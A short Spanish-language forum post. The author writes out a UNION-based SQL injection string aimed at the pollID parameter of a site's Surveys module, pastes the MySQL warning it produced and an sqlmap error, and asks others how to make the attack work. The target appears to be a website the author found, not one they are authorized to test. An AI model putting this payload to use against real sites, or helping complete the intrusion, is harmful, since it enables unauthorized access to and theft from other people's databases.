Encontre una pagina que tiene una vulnerabilidad SQL:

el servidor es un MySQL tengo los detalles del servidor y toda la cosa

estos son los parametros que inyecto:

----> '4+and+1=0+union+select+1+from+votos+--+

a esta linea

----> modules.php?name=Surveys&op=results&pollID=

cuando lo hago obtengo el resultado siguiente:

   
Encuesta



Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
 estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:

[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' or 'access://DATABASE_FILEPATH'